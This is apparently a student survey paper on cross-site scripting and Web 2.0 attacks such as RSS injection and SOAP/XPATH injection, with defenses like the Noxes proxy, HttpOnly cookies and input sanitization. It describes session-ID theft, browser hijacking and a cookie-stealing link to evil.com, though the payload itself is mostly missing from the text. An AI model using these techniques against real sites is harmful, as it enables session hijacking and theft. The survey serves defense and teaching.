Internet & Internet based web applications are becoming popular to perform various on-line tasks and so are web-based vulnerabilities. Web 2.0 is today’ new mantra and much of the new stuff coming up is based on recent advances in Web Technologies viz. XHTML, JavaScript, AJAX, SOAP, Web Services. All these technologies are fast becoming an integral part of new generation Web applications known as Web 2.0 applications. This evolution has led to new attack vectors coming into existence around these new technologies. To combat these new threats one needs to look at different strategies as well. In this paper we shall look at different approaches and tools to improve security at both, the server as well as browser ends. Web applications often make use of JavaScript code that is embedded into web pages to support dynamic client-side behavior. This script code is executed in the context of the user’s web browser. A Virtual Machine running within the browser limits the program to access only certain resources which are most associated with the domain. However if the user mistakenly downloads a compromised or malicious JavaScript code form another website then this code is granted full access to resources such as cookies. Such attacks are called cross-site scripting (XSS) attacks. [1]

This paper presents a brief explanation of various kinds of attacks like XML poisoning, RSS/ATOM Injection, SOAP Parameter Manipulation, XPATH injection and attacks exploiting "client-side" AJAX frameworks. This paper also suggests various ways to mitigate such attacks on Client & Server. Additionally this paper suggests secure coding practices and tips which help avoid majority of these attacks.


XSS attacks are easy to execute, but difficult to detect and prevent. High flexibility of HTML encoding schemes, offering the attacker many possibilities to evade server-side input filters that should prevent malicious scripts from being injected into trusted sites. JavaScript code is usually embedded in the HTML file or included as a separate .js file and this code gets executed on-the-fly by the interpreter. Browsers have a secure sandboxing mechanism, which restricts the code to access certain limited resources. JavaScript programs can also be included from different sites and are allowed to access the resources from the same-origin (domain). Even if the browser provides proper sand-boxing mechanism and conforms the same-domain resource access, the script may still violate the boundary. This happens when user is drawn or tricked to download a JavaScript code through a cross-site scripting (XSS) attack. “Several cross-site scripting attacks have been observed recently example is the Yamanner worm that exploited cross-site scripting opportunities in Yahoo mail’s AJAX call. Another recent example is the Samy worm that exploited MySpace.com’s cross-site scripting flaw.” [2]

“For example, consider the case of a user who accesses the popular trusted.com web site to perform sensitive operations. The web-based application on trusted.com uses a cookie to store sensitive session information in the user’s browser. Note that, because of the same origin policy, this cookie is accessible only to JavaScript code downloaded from a trusted.com web server. However, the user may be also browsing a malicious web site, say www.evil.com, and could be tricked into clicking on the following link:

<a href=”http://www.trusted.com/



</script>”>Click Here


clip_image002The trusted.com web server receives the request and checks if it has the resource which is being requested. When the trusted.com host does not find the requested page, it will return an error message. The web server may also decide to include the requested file name in the return message to specify which file was not found. If this is the case, the file name (which is actually a script) will be sent from the trusted.com web server to the user’s browser and will be executed in the context of the trusted.com origin. When the script is executed, the cookie set by trusted.com will be sent to the malicious web site as a parameter to the invocation of the cookie.php server-side script. The cookie will be saved and can later be used by the owner of the evil.com site to impersonate the unsuspecting user with respect to trusted.com.” [1]

This paper discusses various solutions to mitigate cross-site scripting attacks. In Section 2 all the various types of attacks are discussed. Section 3 discusses a client-side solution called Noxes, which acts as a web-proxy and uses rules to block cross-site scripting attacks. Section 4 presents server-side solutions to detect XSS attacks. Section 5 discusses Server & Client-side solutions for XSS. Then in Section 6 there is a discussion about best security practices, coding tips which helps prevent most of XSS attacks. Section 7 is devoted for future work and application to various other web-technologies.


Wide adoption of XML has lead to many forms of attacks which compromise user information. There are two ways XSS attacks are performed: stored and reflected. A stored XSS attack is a form of attach where the malicious code is permanently stored on the host (e.g., in database table, guestbook etc.). A reflected XSS attack is an attack in which the web server reflects back the malicious code as an error message or a search result which may include some input sent to the server as a part of the request. Such attacks are delivered to the user’s email or as a link on the web-page. [1]


All currently known XSS session hijacking attack methods can be assigned to one of the following different classes: “Session ID theft”, “Browser Hijacking” and “Background XSS Propagation”.


2.1.1 Session ID Theft: Web applications usually employ a SessionID to track the authenticated state of a user. Every request that contains this SessionID is regarded as belonging to the authenticated user. If an attacker can exploit an XSS vulnerability of the web application, he might use a malicious JavaScript to steal the user’s SessionID. It does not matter which of the methods of SessionID storage is used by the application – in all these cases the attacking script is able to obtain the SessionID. The attacking script is now able to communicate the SessionID over the internet to the attacker. As long as the SessionID is valid, the attacker is now able to impersonate the attacked client [11].

2.1.2 Browser Hijacking: This method of session hijacking does not require the communication of the SessionID over the internet. The whole attack takes place in the victim’s browser. Modern web browsers provide the XMLHttpRequest object, which can be used to place GET and POST requests to URLs, that satisfy the same-origin policy. Instead of transferring the SessionID or other authentication credentials to the attacker, the “Browser Hijacking” attack uses this ability to place a series of http requests to the web application. The application’s server cannot differentiate between regular, user initiated requests and the requests that are placed by the script. The malicious script is therefore capable of acting under the identity of the user and commit arbitrary actions on the web application. [11]

2.2.3 Background XSS Propagation: It is sufficient that the user visits only one vulnerable page in which a malicious script has been inserted. However, other attack scenarios require the existence of a JavaScript on a certain webpage to work. For example, even when credit card information has been submitted it is seldom displayed in the web browser. In order to steal this information a malicious script would have to access the HTML form that is used to enter it.

Propagation via iframe inclusion: In this case, the XSS replaces the displayed page with an iframe that takes over the whole browser window. Furthermore, the attacking script causes the iframe to display the attacked webpage, thus creating the impression that noting has happened. As long as the user does not leave the application’s domain, the malicious script is able to monitor the user’s surfing and to include further scripts in the webpages that are displayed inside the iframe.

Propagation via pop under windows: XSS propagation can be implemented using “pop under” windows. On sufficiently fast computers users often fail to notice the opening of such an unwanted window. The attacking script opens such a window and inserts script code in the new window’s body. The new window has a link to the DOM tree of the original document (the father window) via the window.opener property. The script that was included in the new window is therefore able to monitor the user’s behavior and include arbitrary scripts in web pages of the application that are visited during the user’s session.


2.2.1 XML poisoning: [2] In Web 2.0 application lot of XML traffic goes back and forth between server and browser. An attacker can employ this technique to apply recursive payloads to similar-producing XML nodes multiple times. If the server’s handling is poor this may result in a denial of services. Many attackers also produce malformed XML documents that can disrupt logic depending on parsing mechanisms in use on the server. This same attack vector is also used with Web services since they consume SOAP messages (XML messages). Large-scale adaptation of XML at the application layer opens up new opportunities to use this new attack vector.

2.2.2 RSS / Atom injection: [2] RSS feeds are common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client-side. An attacker can inject JavaScript into the RSS feeds to generate attacks on the client browser. An end user visits this particular Web site loads the page with the RSS feed and the malicious script gets executed.

2.2.3 Client side validation in AJAX routines: [2] WEB 2.0 based applications use AJAX routines to do a lot of work on the client-side, such as client-side validations for data type, content-checking, date fields, etc. Normally, these client-side checks must be done again on the server-side. Most programmers fail to do so; their reasoning being the assumption that validation is taken care of in AJAX routines. It is possible to bypass AJAX-based validations and to make POST or GET requests directly to the application that can compromise a Web application’s key resources.

2.2.4 Parameter manipulation with SOAP: [2] Web services consume information and variables from SOAP messages. It is possible to manipulate these variables. An attacker can start manipulating a node and try different injections – SQL, LDAP, XPATH, command shell – and explore possible attack vectors to get a hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the Web services application open to compromise. This is a new available attack vector to target Web applications running with Web services.

2.2.5 XPATH injection in SOAP message: XPATH is a querying language for XML documents and is similar to SQL statements where we can supply certain information (parameters) and fetch rows from the source. If XPATH injection gets executed successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are few known flaws in XPATH that can be leverage by an attacker. The only way to block this attack vector is by providing proper input validation before passing values to an XPATH statement.

2.2.6 RIA thick client binary manipulation: [2] Rich Internet Applications (RIA) use very rich UI features such as Flash, ActiveX Controls or Applets as their primary interfaces to Web applications. At the same time since the entire binary component is downloaded to the client location, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code.


Devising a client-side solution is not easy because of the difficulty of identifying JavaScript code as being malicious. One reason is the high flexibility of HTML encoding schemes, offering the attacker many possibilities for circumventing server-side input filters that should prevent malicious scripts from being injected into trusted sites.

Noxes: is a windows-based personal firewall application that runs as a background windows service. Typically a personal firewall prompts the user for action if a connection request is detected which doesn’t match the firewall rules and the user can decide to allow or block this request. Although personal firewall plays a good role in protecting users from a wide range of threats, they are ineffective against web-based client-side attacks, such as XSS attacks. This is because in a typical configuration, the personal firewall will allow the browser application to make outgoing connections to any IP address with the destination port of 80 (i.e., HTTP) or 443 (i.e., HTTPS). Therefore, an XSS attack that redirects a login form from a trusted web page to the attacker’s server will not be blocked.

Noxes provides an additional layer of protection that existing personal firewall do not support. The main idea is to allow the user to exert control over the connections that the browser is making just as personal firewalls allow a user to control the Internet connections received or originated by process running on the local machine. Noxes operates as a web proxy that fetches HTTP requests on behalf of the user’s browser. Hence, all web connections of the browser pass through Noxes and can either be blocked or allowed based on the current security policy.

A personal web firewall, in theory, will help mitigate XSS attacks because the attacker will not be able to send sensitive information (e.g., cookie or session IDs) to a server under his control without the user’s knowledge. For example, if the attacker is using injected JavaScript to send sensitive information to the server www.evil.com, the tool will raise an alarm because no filter rule will be found for this domain. Hence, the user will have the opportunity to check the details of this connection and to cancel the request.

Every time Noxes fetches a web page on behalf of the user, it analyzes the page and extracts all external links embedded in that page. Then, temporary rules are inserted into the firewall that allow the user to follow each of these external links once. If a request being fetched is not in the local domain, Noxes then checks to see if there is a temporary filter rule for the request. If there is a temporary rule, the request is allowed. If not, Noxes checks its list of permanent rules to find a matching rule. If no rules are found matching the request, the user is prompted for action and can decide manually if the request should be allowed or blocked.

clip_image006Table show the results of authors experiments. Close to 8,000,000 links were analyzed, and 25.98% of the links in the pages point to external domains. Their experiments show that 5.7% of the links would have caused a connection alert. Thus, their XSS mitigation technique would have permitted the access of external links and references without requiring manual interaction in about 94,3% of the cases.


In [5] the author present a Server Side solution using static program analysis that approximates the string output of a program with a context-free grammar. The approximation obtained by the analyzer can be used to check various properties of a server-side program and the pages it generates. To demonstrate the effectiveness of the analysis, the author has implemented a string analyzer for the server-side scripting language PHP. The analyzer is applied to detect cross-site scripting vulnerabilities and to validate pages they generate dynamically. The vulnerabilities can be detected by checking the approximation against the specifications of safe or unsafe strings. For example, Web pages that do not include code executed at the client side are considered to be safe strings.

The analyzer takes two inputs: a PHP program and an input specification that describes the set of possible input to the program. It then generates a context-free grammar approximating the Web pages generated from the input. The analyzer is successfully applied to publicly available PHP programs to detect cross-site scripting vulnerabilities and to validate pages they generate dynamically.

To illustrate the string analysis, let us consider the following program


for ($i = 0; $i < $n; $i++)

$x = "0".$x."1";

echo $x;


The analyzer generates the approximation and following string represents the grammar.


To prevent the vulnerability, a string coming from a user input must be sanitized before embedding it in a Web page. Sanitization is achieved by escaping the special characters such as < and & in HTML. Also by specifying rules to detect <script> tag and similar tags which are the prime causes of XSS attacks.



5.1 EXTRA HTTP HEADERS: [6] A typical AJAX call is like a normal http request. Following snippet shows typical Ajax call:

GET /rss/topstory HTTP/1.1

Host: www.digg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv: Gecko/20060728





Accept-Language: en,en-us;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

A cursory glance at the request gives no indication that the request is made by the XmlHttpRequest object from within the browser. It is possible to add an extra header to the HTTP request as per XmlHttpRequest’s methods that would aid in identifying and fingerprinting the Ajax call. Add a custom header is a good starting point for securing Ajax calls. It is possible to build a security control around this extra header mechanism. We can add JavaScript libraries in your client-side code and use MD5 hashing and other encryption methods. The XmlHttpRequest object controls the POST method along with buffer that the client sends to the server. A secure tunnel can be built over HTTP using Ajax calls by encrypting data as well along with the extra header – another option that needs to be explored.

/* Add Custom Header */

http.open("GET", "/rss/topstory", true);


On the server side we can write rules for all reqests to /rss for presence of Custom Header “Nonce”. This can be achieved using web-server configuration tools like mod_security for Apache or .NET based HTTPModule for IIS in Windows NT/Server


[7] httponly is a Microsoft initiative and is basically a new attribute for cookies which prevents them from being accessed through client-side script. A cookie with this attribute is called an HTTP-only cookie. Any information contained in an HTTP-only cookie is less likely to be disclosed to a hacker or a malicious Web site. The following example is a header that sets an HTTP-only cookie.

Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

Any information contained in an HTTP-only cookie is less likely to be disclosed to a hacker or a malicious Web site. The following example is a header that sets an HTTP-only cookie. This attribute specifies that a cookie is not accessible through script. By using HTTP-only cookies, a Web site eliminates the possibility that sensitive information contained in the cookie can be sent to a hacker’s computer or Web site with script.

A cookie is set on the client with an HTTP response header. The following example shows the syntax used in this header.

Set-Cookie: <name>=<value>[; <name>=<value>]

[; expires=<date>][; domain=<domain_name>]

[; path=<some_path>][; secure][; HttpOnly]

If the HttpOnly attribute is included in the response header, the cookie is still sent when the user browses to a Web site in the valid domain. The cookie cannot be accessed through script in Internet Explorer 6SP1, even by the Web site that set the cookie in the first place. This means that even if a cross-site scripting bug exists, and the user is tricked into clicking a link that exploits this bug, Internet Explorer does not send the cookie to a third party. The information is safe.


XSS vulnerabilities are caused when a Web application returns user-supplied data back to the user without sanitizing it first. Most of the XSS attacks can be minimized by validating user input.

Input and Output Sanitization: [9] There is a standard for protecting a Web application against most attacks — validate and sanitize all user input and output without exception, based on a "Default Deny" policy. If this rule is followed thoroughly, it will eliminate the threat of XSS and SQL injection. Additionally most categories of Web application vulnerabilities can be avoided by simply following this rule. User input means not only form fields and query strings, but all input that can be influenced by the user in any way, including HTTP headers and cookies, etc. Default Deny is the superior policy to follow — nothing should be accepted as input or sent out as output by the system unless it is explicitly stipulated that it is allowed.

The application should have a central input and output validation module that strictly implements a Default Deny policy tailored to its specific needs. Some of the characters that can be used in attacks are > < ( ) [ ] ‘ " ; : – / \ NULL, etc. These characters should be sanitized or filtered whenever possible by an input validation. Input validation should happen before the user-supplied data is used by the application. It’s also a good idea to filter out the term "script" and SQL keywords from user input, if possible.

Auditing: Auditing is indispensable for keeping systems secure. The most important functions of auditing tools, such as the vulnerability scanning function, are automated. They are useful for finding both XSS and SQL injection vulnerabilities before attackers find and exploit them.

– Enable strong cryptographic protection on the forms authentication ticket. This should include both encryption and integrity support. Use SHA1 for HMAC generation and AES for encryption.

– Minimize the lifetime of the ticket as far as possible. Set the timeout attribute to a small value and disable sliding expiration to ensure a fixed expiration period.

Limit Server Responses: In many cases it may be possible to limit the amount of “personalised” data that will be returned to client browsers through the use of generic responses. For example, consider a site that that displays the greeting “Hello, Gunter!” in response to http://trustwebsite.com/greeting.php?name=ABC. It would be a preferable security option to sacrifice this dynamic response with a hard-coded response such as “Hello, User!” [9]

Enforce Response Lengths: For the majority of applications, the developer should be able to limit the maximum length of any user-supplied strings. Although initially enforced at the client-side, all strings should also be checked at the server-side. Where possible, enforce the limitation of the maximum necessary string length by truncating any longer responses. [9]

HTTP POST not GET: In the majority of cases, remote code insertion attacks are likely to be through the submission of user data in HTML forms. One prevention step is to ensure that form submission is only ever done through HTTP POST requests. Allowing HTTP GET request submissions will allow potentially attackers to craft distributable URL’s containing the offending code. When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. [8] [9]

URL Session Identifier: The use of a unique session identifier for each valid user can be used to prevent remote exploitation of URL based code insertion attacks. As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one. Should an attacker discover a flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session timeout, the attacker will not be able make use of the flaw (other than affecting the attacker locally) outside of this period. For additional security, the session ID could also be made in include a hashed version (or checksum) of the client browser’s IP address. [9]


The first line of defense against XSS attacks is input filtering. As long as JavaScript code is properly stripped from all user provided strings and special characters are correctly encoded, XSS attacks are impossible.

Lots of XSS attack prevention techniques can be applied to areas like Semantic Web, which is universal medium for information exchange by putting documents with a computer-processed meaning to it [wiki]. Since Semantic web uses XML it is also prone to many attacks like XPATH injection. Extension of above methods can be applied to Semantic Web also.

[10] “Taint analysis” is a method for data flow tracking in web applications. All user controlled data is marked as “tainted”. Only if the data passes sanitizing functions its status will change to “untainted”. If a web application tries to include tainted data into a webpage a warning will be generated.


XSS vulnerabilities are being discovered and disclosed at an alarming rate. This paper presented various types of attacks on web-based application and suggested several ways of mitigating these attacks. AJAX & Web services are important technological vectors for the WEB 2.0 application space. These technologies are promising and bring new equations to the table, empowering overall effectiveness and efficiency of Web applications. With these new technologies come new security issues. Increased WEB 2.0 security awareness, secure coding practices and secure deployments offer the best defense against these new attack vectors.


[1] Engin Kirda, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic. Noxes: A client-side solution for mitigating cross-site scripting attacks. In The 21st ACM Symposium on Applied Computing (SAC 2006)

[2] Shreeraj Shah, Top 10 Web 2.0 Attack Vectors


[3] CERT, Understanding malicious content mitigation for web developers.

http://www.cert.org/tech_tips/malicious_code_mitigation.html , 2005.

[4] David Scott and Richard Sharp. Abstracting Application-Level Web Security. In Proceedings of the 11th International World Wide Web Conference (WWW 2002), May 2002.

[5] Yasuhiko Minamide. Static approximation of dynamically generated web pages. In WWW ’05: Proceedings of the 14th International Conference on World Wide Web, 2005.

[6] Shreeraj Shah, Web 2.0 defense with Ajax fingerprinting & filtering, [in]Secure Magazine. http://www.insecuremagazine.com/INSECURE-Mag-9.pdf 

[7] Mitigating Cross-site Scripting With HTTP-only Cookies


[8] Best Practices for Secure Development (2001) – Razvan Peteanu

[9] S.G. Masood, Best Practices


[10] Yao-Wen Huang, Fang Yu, Christian Hang, Chung-Hung Tsai, Der-Tsai Lee, and Sy-Yen Kuo. Securing web application code by static analysis and runtime protection. In Proceedings of the 13th conference on World Wide Web, pages 40–52. ACM Press, 2004.

[11] Martin Johns, SessionSafe: Implementing XSS Immune Session Handling (2006)



1 Response » to “Web 2.0 Cross Site Scripting (XSS) Server & Client Side Attacks and Mitigation”

  1. AKSHAY MONGA says:

    hey dis was an awesome work on XSS….i am also into it so please can u ppl suggetst me some good topics for doin research inXSS ??

Leave a Reply